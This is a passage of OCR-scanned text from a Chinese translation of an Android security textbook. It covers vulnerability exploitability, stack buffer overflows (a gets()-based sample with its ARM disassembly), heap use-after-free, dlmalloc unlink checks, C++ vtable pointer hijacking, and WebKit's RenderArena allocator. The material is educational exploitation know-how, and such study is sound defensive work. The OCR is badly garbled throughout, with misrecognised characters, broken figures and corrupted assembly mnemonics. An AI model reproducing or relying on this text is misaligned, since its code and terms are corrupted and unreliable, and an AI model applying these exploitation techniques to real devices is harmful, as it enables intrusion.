复 它 还 是 利用 它 , 根据 利用 的 难度 来 划分 优先 级 都 有 利于 资源 的 合理 调配 。 容 易 利 用 的 漏洞 应 当 
比 难以 利用 的 漏洞 有 更 高 的 优先 级 。 

精确 判断 一 个 漏洞 能 和 否 被 利用 非常 困难 、 复 杂 ， 需 要 漫长 的 过 程 。 根 据 漏洞 和 程序 的 需求 ， 
完成 这 项 任务 的 时 间 可 能 从 几 分 钟 到 几 个 月 不 等 。 当 然 , 修复 漏洞 的 团队 可 能 不 需要 考虑 这 个 任 
务 ， 他 们 要 做 的 只 是 修复 这 个 漏洞 。 如 果 要 给 很 多 漏洞 排出 优先 级 ， 挑 选 出 最 先 修复 的 漏洞 ， 考 
虑 这 一 问题 会 比较 稳妥 。 人 然而， 漏洞 利用 的 研究 人 员 就 没 那么 轻松 了 ， 他 们 必须 完成 这 个 任务 。 

分 析 漏 洞 的 可 利用 性 很 大 程度 上 取决 于 分 析 人 员 的 经 验 和 知识 。 为 了 作出 正确 的 判断 ,分析 
人 员 必 须 掌握 最 新 的 利用 技术 。 他 们 必须 熟悉 目标 平台 上 所 有 的 利用 缓解 技术 。 即 便 是 经 验 和 知 
识 丰 富 的 分 析 人 员 ， 在 判断 漏洞 可 利用 性 问题 上 依然 会 面临 挑战 。 

证 明 一 个 漏洞 是 否 可 利用 有 时 候 很 容易 , 但 是 很 多 时 候 是 不 可 能 的 。 例如 ,对 于 前 面 分 析 的 
漏洞 ， 程 序 的 Pc 寄存 器 会 被 不 确定 的 值 污染 。 这 个 漏洞 第 一 眼看 起 来 很 危险 ， 但 是 在 缓冲 区 被 
释放 后 和 重用 前 控制 它 的 概率 很 低 。 如 何 利 用 此 类 漏洞 会 在 第 8 章 中 进行 介绍 。 
















































































7.10 小结 


在 本 章 中 , 我 们 学 习 了 Android 平台 上 的 调试 和 漏洞 分 析 技 术 。 本 章 包含 了 大 量 Dalvik 和 原 
生 代码 的 调试 技术 , 包括 如 何 使 用 常见 的 调试 工具 , 如 何 利 用 自动 化 来 提高 效率 , 如 何 使 用 AOSP 
支持 的 设备 来 进行 源 代 码 级 别 的 调试 , 以 及 如 何 通过 直接 在 真 机 上 调试 来 提高 性 能 。 我 们 解释 了 
为 什么 符号 在 ARM 平 台 上 更 加 重要 , 说 明了 在 非 AOSP 设备 上 调试 所 面临 的 困难 ， 并 提供 了 解 
决 这 些 问 题 的 应 对 方案 。 

本 章 的 最 后 讨论 了 漏洞 分 析 的 两 个 主要 目标 : 分 析 漏 洞 产 生 的 根源 和 判断 漏洞 的 可 利用 性 。 
为 读者 介绍 了 一 些 漏洞 分 析 的 常见 工具 和 技术 ， 以 便 深入 理解 漏洞 。 还 带领 读者 分 析 了 Android 
浏览 需 中 一 个 漏洞 的 成 因 ， 教 会 读者 在 判断 漏洞 可 利用 性 方面 应 该 怎样 进行 考量 。 

下 一 章 考察 Android 系统 用 户 空 间 中 的 漏洞 利用 技术 ,涵盖 了 关键 代码 的 构造 ， 与 利用 代码 
相关 的 操作 系统 特性 ， 以 及 一 些 漏 洞 。 






































用 户 态 软件 的 漏洞 利用 








本 章 主要 介绍 Android 系统 用 户 态 软件 中 内 存 破坏 漏洞 的 利用 方法 。 我 们 会 在 ARM 架构 上 
讨论 常见 的 漏洞 类 型 ， 例 如 栈 溢出 。 本 章 首先 解释 开发 漏洞 利用 代码 ( exploit ) 中 的 相关 实现 细 
节 ; 然后 以 一 些 曾经 公开 的 exploit 为 例 ， 帮 助理 解 前 面 介绍 的 概念 ; 最 后 以 WebKit 浏览 器 引擎 
中 一 个 可 远程 利用 的 漏洞 为 例 ， 介 绍 高 级 堆 利用 技术 。 


8.1 内 存 破坏 漏洞 基础 


要 理解 内 存 破 坏 漏洞 的 利用 技术 , 最 关键 的 是 抽象 。 很 重要 的 一 点 是 , 应 当 避 兔 用 C 语言 这 
种 高 级 语言 的 方式 来 思考 问题 。 作 为 攻击 者 , 只 需要 把 目标 机 器 的 内 存 当 作 有 限 数量 的 内 存单 元 ， 
由 目标 程序 的 语义 进行 操作 。 内 存单 元 包括 某 些 指令 类 型 或 者 函数 暗含 的 内 存 区 域 , 例如 栈 和 堆 。 

接 下 来 的 几 节 会 讨论 内 存 破坏 漏洞 的 典型 案例 ,以 及 它们 在 Android 平 台 上 是 如 何 被 利用 的 。 
这 些 漏洞 利用 方法 都 有 一 个 共同 特点 : 攻击 者 利用 目标 代码 破坏 某 些 内 存 区 域 , 使 得 目标 程序 转 
入 攻击 者 预期 的 状态 。 有 的 攻击 方式 比较 直接 , 例如 将 原生 代码 的 执行 流转 入 攻击 者 所 控制 的 内 
存 ; 有 的 则 比较 隐秘 ,攻击 者 可 以 让 程序 语义 发 生 一 些 攻击 者 所 设 定 的 非 预期 变化 ( 通常 称 之 为 
狮 亚 机 器 编程 )。 
用 户 空间 中 堆 和 栈 上 的 利用 技术 有 非常 多 的 细节 , 也 有 很 多 高 级 方法 。 需要 采用 的 技术 取决 
于 漏洞 本 身 ， 本章 无 法 一 一 介绍 。 网 上 有 不 计 其 数 的 资源 介绍 与 具体 架构 相关 的 细节 ,本 章 仅 专 
注 于 介绍 ARM 设备 的 Android 系统 中 最 常见 的 漏洞 利用 相关 概念 。 


8.1.1 栈 缓 冲 区 溢出 


就 像 其 他 体系 架构 中 的 应 用 程序 二 进 制 接口 (ABI ) 一 样 ，ARM 舱 入 式 ABI (EABI ) 大 量 
使 用 了 特定 于 线程 的 ) 栈 。 下 列 是 ARM 使 用 的 ABI 规 则 : 
口 函数 的 参数 如 果 超 过 4 个 ， 超 过 的 部 分 会 使 用 栈 来 传递 ; 
口 局 部 变量 如 果 不 能 存储 在 寄存 器 中 ， 则 在 当前 栈 帧 中 分 配 。 特 别 是 大 于 32 比特 的 变量 和 
上 针 引 用 的 变量 ; 
口 非 叶 节点 函数 (Non-leaf Function ) 的 返回 地 址 存储 在 栈 上 ， 更 多 关于 也 数 返回 地 址 的 细 
节 将 在 第 9 章 中 介绍 。 
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如 果 一 个 函数 中 用 到 了 栈 ,那么 它 通常 会 以 prologue 代 码 开始 ,以 epilogue 代 码 结束 .prologue 
代码 用 来 初始 栈 帧 ，epilogue 代码 则 用 来 还 原 栈 帧 。prologue 代码 把 函数 执行 过 程 中 会 遭 到 破坏 
的 寄存 器 值 保 存在 栈 上 ; 函数 返回 时 ，epilogue 代码 就 会 恢复 相应 的 寄存 器 值 。prologue 代码 也 
会 通过 调整 栈 指 针 来 为 栈 上 的 局 部 变量 分 配 空间 。 栈 空间 从 虚拟 内 存 高 地 址 往 低地 址 方向 增长 ， 
所 以 栈 指 针 指 向 的 地 址 会 在 prologue 代码 中 变 低 , 在 epilogue 代码 中 变 高 。 伦 套 的 函数 调用 会 产 
生 如 图 8-1 所 示 的 栈 帧 结构 。 












































二 低地 址 





fp—> 保存 的 栈 帧 指针 n 








保存 的 程序 计数 器 





local variables1 
saved frame pointer1 


saved program counter 1 














栈 的 开始 位 置 一 一 > 高 地 址 


图 8-1 多 栈 帧 示例 


注意 ， 尺 管 在 Thumb 模式 下 有 一 些 处 理 栈 指针 寄存 带 的 特殊 指令 (push 和 pop )， 栈 的 本 
质 概念 只 是 不 同 函数 之 间 的 ABI 约定 。 栈 指针 寄存 器 也 可 以 被 用 作 其 他 目的 。 因 此 ， 在 攻击 者 
看 来 ， 栈 上 分 配 的 局 部 变量 与 其 他 内 存 并 无 本 质 区 别 。 

如 果 漏 洞 与 栈 上 的 局 部 变量 有 关 ， 就 十 分 有 关注 的 价值 ， 因 为 其 附近 有 与 控制 相关 的 数据 ; 
已 保存 的 函数 返回 地 址 。 如 图 8-1 所 示 ， 所 有 的 局 部 变量 都 挨 得 很 近 ， 没 有 交错 的 控制 数据 。 事 
实 上 ， 这 样 的 栈 帧 布局 信息 被 隐 式 地 编码 在 了 编译 器 生成 的 原生 代码 中 。 

利用 局 部 变量 越界 的 漏洞 ， 攻 击 者 可 以 很 容易 地 向 其 他 局 部 变量 或 者 控制 数据 写 和 人 想 要 的 数 
据 。Alephl 是 第 一 位 公开 发 表 相 关 文章 的 人 ， 这 篇 有 较 大 影响 的 文章 名 为 “Smashing the Stack for 
Fun and Profit”( Phrack 第 49 期 ， 文 章 14，http://phrack.org/issues/49/14.html#article )。 由 于 临时 字符 
串 或 数组 经 常 被 分 配 在 栈 上 ， 所 以 这 是 一 种 很 常见 的 漏洞 类 型 。 下 面 这 段 代 码 是 一 个 简单 的 例子 。 

栈 洪 出 代码 样 例 

void getname() { 
struct{ 
char name[32]; 


int age 
} info;y 



























































info.age = 23; 
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printf("Please enter your name: ") 
gets (info.name) ; 


printf("Hello %s, I guess you are %u years old?!\n", 


info.name, 
info.age); 


} 
众所周知 ， | 函数 不 会 进行 边界 检查 。 如 果 往 标准 输入 stain 中 输入 超过 32 个 字符 ， 


程序 行为 就 会 出 现 异常 。 使 用 GCC 4.7.1 加 上 选项 -mthumb -mcpu=cortex-a9 -02， 和 后 成 的 汇 
编 代 码 如 下 : 


栈 浇 出 代码 样 例 反 汇编 


00000000 <getname>: 
0: f240 0000 movw r0, #0 








上 在 栈 上 保存 返回 地 址 





心 


500 push {lr} 
#7 movs r3, #23 


Cn 





| 在 栈 上 为 局 部 变量 预 留 空间 





OO 


: b08b sub sp, #44 
: f2c0 0000 movt r0, #0 


yo 





| 初始 化 变量 age 为 固定 值 23， 之 前 已 经 将 r3 赋 为 23 





[07 


3 str r3, [sp, #36] 
: £7ff fffe bl 0 <printf> 


fy 
OO 





| 计算 缓冲 区 地 址 ， 作 为 gets 函数 的 第 一 个 参数 





14: a802 adqd r0, sp, #4 
16: f7ff fffe bl 0 <gets> 
1a: f240 0000 movw r0, #0 





| 载 入 局 部 变量 age， 用 于 打印 





le: 9a01 ldr r2, [sp, #36] 
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| 再 次 计算 缓冲 区 地 址 ， 用 于 打印 





20: a902 adqd rl1l, sp, #4 
22: f2c0 0000 movt r0, #0 
26» :f7ff fffe bl 0 <printf> 
2a: b00b adqd sp, #44 





上 从 栈 上 载 入 返回 地 址 并 返回 





2c: pq00 pop {pc} 


正如 前 面 所 说 ， 函 数 代码 定义 了 栈 帧 布局 ， 或 者 说 是 定义 了 相对 SP 寄存 器 的 偏 移 。 栈 布局 
如 图 8-2 所 示 。 


























a name[32] 低 
sp+36 age 
保存 的 程序 计数 器 高 








图 8-2 ” 栈 帧 布局 样 例 


当 攻 击 者 输入 超过 32 字 节 的 数据 时 , 33 到 36 字 节 会 覆盖 age 这 个 局 部 变量 , 37 到 40 字 节 
会 覆盖 栈 上 保存 的 返回 地 址 。 所 以 攻击 者 可 以 把 程序 执行 流 重 定 向 到 任意 地 址 上 , 或 者 修改 一 个 
原本 不 能 修改 的 局 部 变量 。 

由 于 这 种 漏洞 类 型 频繁 出 现 , GNU C 编译 屁 实 现 了 一 种 绥 解 措施 , 自从 Android 第 一 个 版 本 
发 布 就 默认 开启 了， 具体 请 参考 12.7 节 。 即 便 有 了 栈 cookie 这 个 绥 解 措施 ， 依 然 可 以 使 用 一 些 
与 漏洞 有 关 的 技术 来 对 程序 发 起 攻击 ， 例 如 马上 介绍 的 zergRush 漏洞 利用 案例 中 使 用 的 技巧 。 
尽管 存在 缓解 措施 ， 本 章 中 标准 的 栈 缓冲 区 溢出 依然 是 一 个 用 来 介绍 内 存 破 坏 漏洞 的 好 例子 。 


8.1.2 堆 的 漏洞 利用 


生存 域 超过 一 个 函数 范围 的 非 局 部 对 象 必须 分 配 在 堆 上 。 堆 上 的 数组 和 字符 串 与 栈 上 的 情况 
相同 ， 也 会 面临 越界 的 问题 。 除 了 数据 本 身 ， 堆 上 分 配 的 每 一 个 对 象 内 还 有 控制 元 数据 。 与 栈 上 
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的 局 部 变量 不 同 , 堆 分 配 变量 的 生命 周期 并 非 由 编译 器 自动 管理 。 这 两 个 原因 使 堆 上 的 漏洞 变 得 
容易 利用 ， 攻 击 者 可 以 利用 的 漏洞 也 就 更 多 了 。 





1. 释放 后 重用 问题 




















释放 后 重用 问题 是 指 , 应 用 程序 使 用 指针 访问 了 一 个 已 经 通过 free 也 数 或 delete 操作 符 
释放 过 的 对 象 。 在 复杂 的 软件 中 ， 这 是 一 个 很 常见 的 bug， 并 且 很 难 通过 人 工 源 代码 审计 发 现 。 


因为 aelete 操作 符 内 部 也 依赖 于 free 函数 释放 内 存 ， 所 以 对 








| aelete 和 free 不 作 区 分 。 


大 部 分 堆 分 配器 在 释放 一 块 分 配 过 的 内 存 时 不 会 修改 其 内 容 , 原先 使 用 时 的 内 存 数据 会 保持 

不 变 。 很 多 分 配 需 会 在 释放 内 存 块 最 开始 的 地 方 存储 一 些 控制 信息 , 但 是 大 多 数 内 存 块 内 的 数据 
依然 保持 原样 。 释 放 后 的 内 存 被 使 用 时 ， 会 产生 不 同 的 情况 。 
口 被 释放 的 内 存 还 没有 被 用 作 新 的 内 存 分 配 释放 后 的 内 存 被 使 用 时 ， 它 们 的 内 容 与 释放 前 

的 相同 。 在 这 种 情况 下 ，bug 可 能 不 会 表现 出 来 。 但 是 有 些 时 候 ， 析 构 器 可 能 会 让 对 象 的 





内 容 失 效 ， 访 问 时 就 可 能 会 造 





攻击 者 可 以 因此 获得 敏感 内 存 数据 。 
口 被 释放 的 内 存 已 经 被 全 部 或 部 分 用 作 新 的 内 存 分 配 在 这 种 情况 下 ， 两 个 语义 上 完全 不 同 
的 指针 指向 同一 内 存 地 址 ， 如 果 两 种 语义 下 的 代码 互相 冲突 ， 就 会 导致 程序 崩溃 。 例 如 ， 
一 个 函数 可 能 会 在 分 配 的 内 存 中 写 人 数据， 而 这 些 数据 在 另 一 个 函数 中 则 被 用 作 内 存 地 





址 。 如 图 8-3 所 示 。 





class A{ 





int example_1; 
int example_2; 





example_3 











2. 自 定义 分 配器 


class B{ 


char example_3[8]; 

















图 8-3 堆 上 的 释放 后 重用 示意 

如 果 没 有 被 其 他 的 内 存 分 配 使 用 , 被 释放 的 内 存 块 就 没有 多 大 用 处 了 ( 除非 可 以 让 程序 再 一 
次 释放 这 块 内 存 )。 如果 能 通过 精心 构造 应 用 的 输入 来 产生 大 小 相同 的 内 存 块 分 配 ， 释 放 点 就 可 
以 正好 被 新 的 分 配 所 用 。 不 过 这 种 方法 与 特定 的 堆 分 配器 实现 相关 。 





























成 程序 骨 演 。 除 此 之 外 ， 这 种 情况 还 可 能 会 导致 信息 泄露 ， 


大 多 数 开发 者 都 认为 堆 分 配器 是 操作 系统 的 一 部 分 , 但 事实 并 非 如 此 。 操作 系统 只 提供 了 页 


分 配 (大 小 通常 是 4KB ) 的 机 








前 ， 堆 分 配 融 负 责 ; 








等 页 划分 成 想 要 分 配 的 大 小 。 大 多 数 人 使 月 








目的 是 


C 运行 时 库 libc ) 中 的 堆 分 配器 ， 应 用 程序 完全 可 以 使 用 基于 操作 系统 页 分 配 机 制 的 其 他 分 配 


分 
器 。 事 实 上 ， 大 部 分 桌面 浏览 器 出 于 性 能 的 考虑 而 采取 了 该 做 法 。 
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认为 基于 WebKit 的 浏览 器 在 所 有 架构 上 都 使 用 TCmalloc 分 配器 是 一 种 常见 的 错误 。Android 
浏览 器 就 是 一 个 反例 : 虽然 基于 WebKit， 但 是 它 使 用 的 是 Bionic C 库 中 的 dumalloc 分 配器 。 

3. Android 系统 中 的 dimalloc 分 配器 

Android 系统 中 的 Bionic libc 库 内 置 了 著名 的 dumalloc 分 配器 , 该 分 配器 由 Doug Lea 于 1987 
年 编写 的 ,许多 开源 的 libc 库 都 使 用 了 dlmalloc, 包括 使 用 广泛 的 老 版 本 GNU libc。 新 版 GNU libc 
使 用 了 一 个 dlmalloc 的 修改 版 。 
在 Android 4.1.2 以 及 之 前 版 本 的 Android 系统 中 ，Bionic 均 使 用 了 2005 年 的 dlmalloc 2.8.3 
版 本 。Android 4.2 将 dimalloc 升级 到 了 2.8.6 版 本 。 下 面 介 绍 的 特性 在 这 两 个 版 本 中 均 适 用 。 

分 配器 的 作用 是 将 操作 系统 分 配 出 来 的 内 存 页 划分 成 内 存 块 , 其 中 包含 与 分 配 相关 的 控制 信 
息 头 以 及 请 求 的 程序 内 存 。 虽 然 请 求 的 内 存 可 以 达到 字 节 的 粒度 , 但 是 内 存 块 的 默认 大 小 是 请 求 
字 节 数 向 上 取 整 得 到 的 8 的 倍数 。 有 时 为 了 提高 性 能 ， 内 存 块 的 大 小 可 能 是 更 多 字 节 的 倍数 。 例 
如 在 某 些 英特尔 的 主板 上 ， 内 存 块 的 大 小 就 是 16 字 节 的 倍数 。 由 于 要 向 上 取 整 ， 申 请 不 同 大 小 
的 内 存 时 , 分 配器 实际 分 配 的 内 存 块 可 能 是 相同 的 。 因 此 ,释放 后 重用 漏洞 的 利用 中 就 可 以 利用 
这 一 特性 向 已 释放 的 内 存 块 填充 数据 。 

为 了 提高 内 存 分 配 与 释放 的 性 能 ，dlmalloc 在 内 存 块 中 存储 了 控制 数据 。 内 存 块 最 开头 的 两 
个 字 节 存 放 了 两 个 指针 大 小 , 然后 紧 接 着 存放 的 就 是 实际 数据 。 开 头 的 两 个 字 节 存放 了 前 一 个 内 
存 块 和 当前 内 存 块 的 大 小 , 这样 分 配器 就 可 以 从 两 个 方向 高 效 地 遍历 内 存 块 ,在 释放 的 内 存 块 中 ， 
实际 数据 部 分 的 开头 也 包含 一 些 额 外 的 信息 。 对 于 小 于 256 字 节 的 内 存 块 , 这 些 额 外 信息 是 两 个 
向 前 和 向 后 的 指针 ,， 用 来 把 这 些 相 同 大 小 的 已 释放 内 存 块 组 成 一 个 双向 链表 。 对 于 大 于 256 字 节 
的 内 存 块 ， 这 些 释 放 的 内 存 块 组 成 一 个 特 里 结构 (trie )， 需 要 存储 更 多 的 指针 。 更 多 细节 请 参 
dlmalloc 源 代码 ， 其 中 包含 大 量 注释 。 小 于 256 字 节 的 内 存 块 结构 如 图 8-4 所 示 。 
























































































































































dimalloc 空 亲 内 存 块 dlmalloc 已 分 配 内 存 块 
前 一 个 内 存 块 大 小 前 一 个 内 存 块 大 小 
链表 前 向 指针 <— pointer 
链表 后 向 指针 用 户 数 据 

















图 8-4 ”dlmalloc 内 存 块 的 控制 头 和 链表 结构 


为 了 优化 分 配 性 能 , 释放 过 的 小 内 存 块 会 按照 大 小 分 类 。 由 这 些 不 同 大 小 的 内 存 块 组 成 双向 
链表 ， 链 表 头 被 存放 在 一 个 数组 bin 中 。 这 使 得 分 配 内 存 时 的 查询 时 间 是 常量 。 使 用 free 函数 
释放 一 个 内 存 块 时 ，dlmalloc 会 检查 它 相 邻 的 内 存 块 是 否 也 已 经 被 释放 ， 如 果 是 ,那么 相 邻 的 内 
存 块 会 合并 成 一 个 内 存 块 , 这 个 过 程 叫 作 coalescing。 coalescing 发 生 于 把 合并 后 的 内 存 块 放 入 bin 
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之 前 ， 所 以 bin 并 不 会 影响 coalescing 的 行为 (不 同 于 TCmalloc 分 配器 ， 后 者 只 会 合并 那些 适合 
成 为 分 配 缓存 的 内 存 块 )。 攻击 者 如 果 想 要 把 堆 分 配 变 成 可 控 的 状态 , 这 一 特性 具有 较 大 的 意义 。 
口 要 利用 释放 后 重用 漏洞 ， 攻 击 者 必须 保证 与 被 释放 内 存 块 相 邻 的 内 存 块 依然 正在 被 使 用 。 
否则 新 的 分 配 就 不 会 按照 预想 从 被 释放 的 地 方 分 配 ， 而 是 会 从 其 他 地 方 产生 。 这 是 因为 
释放 处 的 内 存 块 已 经 被 合并 成 更 大 的 内 存 块 。 即 便 新 的 分 配 产生 自 释 放 的 同一 内 存 块 ， 
如 果 被 释放 的 内 存 块 与 前 面 的 内 存 块 合并 ， 新 分 配 内 存 的 起 始 也 有 可 能 向 前 移动 。 
口 对 于 堆 溢 出 或 是 其 他 破坏 内 存 块 控 制 数据 的 攻击 ， 内 存 块 的 合并 会 导致 控制 数据 移动 至 
前 面 的 内 存 块 中 ， 从 而 无 法 控制 。 
无 论 是 哪 种 情况 ， 都 可 以 事先 在 堆 上 分 配 很 多 占用 的 小 内 存 块 来 避免 发 生 合并 。 
很 多 现代 的 堆 分 配器 在 分 配 和 释放 内 存 时 有 额外 的 安全 检查 , 以 防止 一 些 堆 的 攻击 。dlmalloc 

中 的 检查 只 涉及 控制 数据 。free 函数 检查 了 以 下 不 变量 。 

口 下 一 个 相 邻 的 内 存 块 地 址 必须 在 当前 内 存 块 地 址 的 后 面 ， 这 能 避免 当前 块 地 址 加 上 内 存 

块 大 小 时 发 生 整数 溢出 。 

口 前 一 个 相 邻 内 存 块 必须 在 堆 上 ， 这 可 以 通过 与 堆 初 始 化 时 的 全 局 最 小 地 址 进行 比较 来 判 

断 。 这 个 检查 可 以 避免 前 一 个 内 存 块 大 小 字段 数值 过 大 。 

口 发 生 内 存 块 合并 或 者 产生 一 个 新 的 分 配 时 ， 就 会 发 生 空闲 块 链表 的 元 素 删 除 (unlink ) 操 
作 ， 这 会 触发 unlink 检查 。 首 先 ， 它 会 检查 待 删除 内 存 块 向 前 指针 指向 的 内 存 块 ， 保 证 
其 向 后 指针 指向 当前 块 。 其 次 ， 验 证 向 后 指针 指向 的 内 存 块 ， 保 证 其 向 前 指针 指向 当前 
块 。 这 样 ， 通 过 覆盖 链表 指针 来 修改 任意 值 的 攻击 就 会 得 到 缓解 。 但 是 ， 对 于 那些 已 经 
有 指向 内 存 块 指针 的 内 存 ( 例如 bin 列表 的 头 )， 依 然 可 以 用 这 种 攻击 来 覆盖 。 

malloc 中 的 安全 检查 基本 就 是 上 面 提 到 的 unlink 检查 。 尽 管 这 些 检查 还 不 能 完全 应 对 一 些 

特殊 场景 ， 但 是 攻击 堆 上 应 用 相关 的 指针 会 更 加 容易 。 可 以 参考 Phrack 杂志 第 66 期 (文章 6 和 

10 )“Yet another free () exploitation technique” 以 及 “MALLOC DES-MALEFICARUM ”来 了 解 

其 他 通用 的 技术 。 下 一 节 介 绍 如 何 攻击 内 存 块 中 特定 于 应 用 的 指针 。 

4. C++ 虚 函数 表 指 针 
C++ 之 所 以 拥有 多 态 特 性 ， 根 本 上 是 因为 引入 了 虚 函 数 (virtual functions )。 子 类 的 这 些 虚 也 

数 可 以 与 基 类 不 同 ， 进 行 专门 定制 。 即 便 运 行 时 代码 只 知道 它 的 基 类 ， 也 能 调用 正确 的 函数 。 面 

向 对 象 编程 中 虚 函 数 的 具体 细节 超出 了 本 书 讨论 的 范围 ，B. Stroustrup 于 1997 年 所 著 的 《C++ 编 

程 语言 (第 3 版 )》 当 中 有 很 好 的 介绍 。 

攻击 者 并 不 会 关注 C++ 的 面向 对 象 编程 思想 有 多 人 么 美妙 , 只 关心 编译 器 如 何 实现 虚 函 数 的 调 

用 。 由 于 虚 函 数 的 解析 发 生 在 运行 时 , 所 以 在 类 的 内 存 表示 中 一 定 存储 着 虚 函 数 的 信息 。 事 实 上 ， 

GCC 会 把 一 个 虚 函 数 表 的 指针 ( virtual function table pointer， 简 称 vftable ) 放 在 对 象 的 开始 位 置 。 

这 个 指针 指向 的 是 由 所 有 函数 的 指针 组 成 的 表 , 编译 器 并 没有 把 所 有 函数 的 指针 都 放 在 每 个 对 象 

内 存 中 ， 这 样 可 以 直接 缩小 对 象 ， 因 为 特定 对 象 一 定 属于 一 个 类 ， 并 且 拥有 确定 数量 的 虚 函 数 。 

二 进 制 文件 包含 了 每 个 基 类 的 虚 函 数 表 。 对 象 的 虚 函 数 表 由 构造 函数 进行 初始 化 。 更 多 实现 细节 

请 参考 S.Lippman 著 的 JInside the C++ Object Model ( Addison-Wesley，1996 )。 类 对 象 在 内 存 中 的 
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基本 布局 如 图 8-5 所 示 。 
堆 代码 段 .text 


类 实例 A,B 


席 函 数 表 指针 























孟 数 表 指 针 
member 1 函数 指针 3 


























图 8-5 C++ 类 中 的 虚 函 数 表 


虚 函 数 调 用 暗含 了 类 实例 内 存 的 间接 访问 ; 类 实例 往往 分 配 在 堆 中 。 在 ARM 体系 结构 下 ， 
GCC 虚 函 数 调 用 大 致 如 下 所 示 : 
WebKit 虚 函 数 调用 示例 

















| 从 类 实例 的 起 始 内 存 中 取出 虚 函 数 表 ， 存 在 x0 中 





ldr r0, [r4, #0] 
subs r5, r6, r5 





| 在 虚 函 数 表 偏 移 722 处 取得 想 要 调用 的 函数 指针 








ldr.w r3, [r0, #772] 





上 为 函数 调用 设置 参数 r0 





mov r0, r4 





上 调用 这 个 函数 指针 





blx r3 

当 堆 上 发 生 内 存 破 坏 漏 洞 时 ， 攻 击 者 可 以 通过 控制 虚 函 数 表 指 针 让 它 指向 任何 地 方 。 尽 管 
vftable 通常 在 二 进 制 的 text 段 当 中 ,攻击 者 也 可 以 把 它 指向 堆 上 伪造 的 虚 函 数 表 。 然 后 ， 当 对 
象 的 虚 函 数 被 调用 时 ,伪造 的 虚 函 数 表 就 可 以 把 控制 流动 持 到 攻击 者 指定 的 任何 地 方 。 

这 种 技术 的 一 个 缺点 在 于 , 攻击 者 想 调 用 的 函数 不 能 直接 通过 窗 盖 C++ 对 象 来 写 人 内 存 : 首 
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先 , 攻击 者 需要 往 能 够 泄露 地 址 的 堆 中 填充 数据 ， 作 为 伪造 的 虚 也 数 表 ; 其 次 ,利用 应 用 逻辑 来 
履 盖 虚 孔 数 表 指 针 ， 将 指向 攻击 者 能 控制 的 地 方 。 下 一 节 会 展示 相关 例子 。 

5. WebkKit 分 配器 : RenderArena 

正如 之 前 所 说 ， 程 序 可 能 会 定制 为 自身 进行 优化 的 堆 分 配器 。WebKit 泻 染 引 擎 就 带 有 一 个 
堆 分 配器 来 优化 泻 染 树 (RenderTree ) 的 生成 速度 。 每 个 DOM 树 都 对 应 着 一 个 泻 染 树 结构 ， 包 
含 页 面 中 的 所 有 元 素 及 其 各 自 位 置 、 样 式 等 需要 尝 染 的 属性 。 每 次 页 面 布局 发 生变 化 ， 就 需要 重 
构 泻 染 树 ( 如 改变 窗口 大 小 ， 修 改 DOM 树 等 )， 所 以 泻 染 树 需 要 一 个 快速 的 分 配器 。 泻 染 树 的 
每 个 节点 ( 即 C++ 对 象 ) 都 使 用 特殊 的 分 配器 RenderArena 来 分 配 。 

RenderArena 分 配器 并 不 是 基于 操作 系统 的 页 分 配 , 而 是 基于 堆 上 大 内 存 块 的 分 配 来 实现 的 。 
这 些 较 大 内 存 块 的 分 配 使 用 了 我 们 熟悉 的 dimalloc 。dlmalloc 分 配 的 大 内 存 块 会 进一步 为 
RenderArena 的 分 配 所 用 ,因而 可 以 将 RenderArena 称 为 “ 堆 上 的 堆 ”, 在 ARM 架构 下 ,RenderArena 
的 分 配 都 是 0x1000 字 节 ， 加 上 arena 头 后 共 0x1018 字 节 。 

RenderArena 的 分 配 策略 非常 简单 ， 容 易 解释 。 内 存 块 从 不 合并 ; 同样 大 小 的 空闲 内 存 块 组 
成 单 向 链接 的 FILO ( First-In-Last-Out ) 结构 ， 等 竺 新 的 分 配 。 如 果 在 空闲 内 存 块 中 无 法 找到 新 
分 配 的 大 小 ， 则 在 当前 RenderArena 的 最 后 创建 一 个 新 的 内 存 块 。 如 果 当 前 的 arena 大 小 不 够 , 无 
法 满足 新 的 分 配 ， 则 使 用 dlmalloc 创建 一 个 新 的 Arena。 这 个 分 配 策 略 虽 然 很 简单 ， 但 是 很 有 效 。 
这 是 因为 在 这 个 特殊 的 堆 上 只 有 固定 大 小 的 C++ 类 会 被 分 配 ， 整 体 来 说 ， 分 配 大 小 的 变化 不 大 。 

由 于 分 配 策略 足够 简单 , 所 以 内 存 块 中 并 不 用 存储 元 数据 。 空 闲 内 存 块 的 第 一 个 机 器 字 存 储 
指向 下 一 个 相同 大 小 的 空闲 块 指针 ， 组 成 了 前 面 提 到 的 单 向 FILO 链表 。 

在 空闲 内 存 块 的 开头 存放 指向 下 一 个 相同 大 小 空闲 块 的 指针 为 攻击 者 提供 了 便利 。 因 为 在 
RenderArena 上 分 配 的 所 有 对 象 都 是 C++ 类 的 对 象 ， 都 继承 于 相同 的 基 类 ， 并 且 在 最 开头 都 有 虚 
函数 表 指 针 ， 这 个 指针 与 链表 指针 重合 。 这 样 ，RenderArena 分 配器 会 使 虚 函 数 表 指针 指向 相同 
尺寸 的 前 一 个 空闲 块 ， 如 图 8-6 所 示 。 





























































































































虚 函 数 表 指 针 函数 指针 1 





下 一 个 空闲 块 成 员 变量 1 











图 8-6 vftptr 指 向 下 一 个 空闲 块 


在 释放 后 重用 之 前 ， 如 果 相 同 大 小 的 内 存 块 分 配 可 以 被 控制 然后 释放 ， 那 么 执行 流 就 可 以 被 
支持 , 并 且 无 需 进 行 额外 构造 。8.3 节 讨 论 了 这 种 场景 , 即便 推 内 存 分 配 无 法 控制 , 也 能 成 功利 用 。 

这 个 利用 技术 在 Hackito Ero Sum 2012 会 议 上 公开 ， 之 后 谷歌 在 最 新 的 WebKit 更 新 中 给 出 
了 缓解 措施 。 链 表 指 针 被 运行 时 生成 的 幻 数 所 遮 淖 ,这 样 该 数 就 不 再 是 有 效 的 虚 函 数 表 指针 。 纪 
数 基于 ASLR 的 炉 生成 ， 最 高 有 效 位 置 为 1。 这 种 方案 保证 生成 的 数 无 法 预测 ， 并 且 很 有 可 能 不 
是 一 个 有 效 的 指针 。 
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8.2 公开 的 漏洞 利用 


第 3 章 简要 介绍 了 许多 本 地 提 权 的 利用 。 本 章 会 详细 介绍 三 个 漏洞 及 其 利用 , 尽 可 能 让 大 家 
了 解 Android 生态 系统 中 用 户 态 程序 的 漏洞 利用 技术 。 
前 两 个 漏洞 与 Android 自 定义 的 自动 挂 载 守 护 进 程 vold 有 关 。 这 个 软件 是 专门 为 Android 开 
发 的 ， 曾 经 在 两 个 不 同 的 攻击 面 上 曝 出 漏洞 。 第 一 个 漏洞 与 NETLINK 套 接 字 相关 。 这 是 一 个 特 
